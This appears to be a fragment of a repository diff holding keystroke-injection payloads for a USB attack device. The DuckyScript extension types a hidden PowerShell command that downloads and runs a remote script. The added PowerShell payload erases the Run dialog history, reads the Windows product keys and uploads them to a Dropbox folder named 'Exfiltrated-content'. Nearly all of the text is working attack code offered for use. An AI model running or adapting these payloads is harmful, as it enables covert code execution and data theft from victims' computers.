#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
DELAY 500
#FAILURE_LED_MODE
END_IF_DEFINED
#FAILURE_ATTACKMODE
STOP_PAYLOAD
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION

View File

@ -0,0 +1,47 @@
$REFRESH_TOKEN = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
$APP_KEY = "XXXXXXXXXXXXXXX"
$APP_SECRET = "XXXXXXXXXXXXXXX"
function Send-ToDropbox {
[CmdletBinding()]
param(
[Parameter(Mandatory = $true)]
[string]$Content,
[Parameter(Mandatory = $true)]
[string]$RefreshToken,
[Parameter(Mandatory = $true)]
[string]$AppKey,
[Parameter(Mandatory = $true)]
[string]$AppSecret,
[string]$OutputFolder = "Exfiltrated-content",
[string]$OutputFile = "[${env:COMPUTERNAME}-${env:USERNAME}].txt"
)
try {
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{
"Authorization" = "Bearer $((
Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{
"Content-Type" = "application/x-www-form-urlencoded"
} -Body @{
"grant_type" = "refresh_token";
"refresh_token" = $RefreshToken;
"client_id" = $AppKey;
"client_secret" = $AppSecret
}
).access_token)";
"Content-Type" = "application/octet-stream";
"Dropbox-API-Arg" = "{""path"":""/$OutputFolder/$OutputFile"",""mode"":""add"",""autorename"":true,""mute"":false}"
} -Body $Content | Out-Null
}
catch {
Write-Host "An error occurred: $_"
}
}
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
$ProductKey = "Original Product Key: $((Get-WmiObject -Query 'select * from SoftwareLicensingService').OA3xOriginalProductKey | Out-String)`n"
$ProductKey += "Backup Product Key: $((Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform').BackupProductKeyDefault | Out-String)"
Send-ToDropbox -Content $ProductKey -RefreshToken $REFRESH_TOKEN -AppKey $APP_KEY -AppSecret $APP_SECRET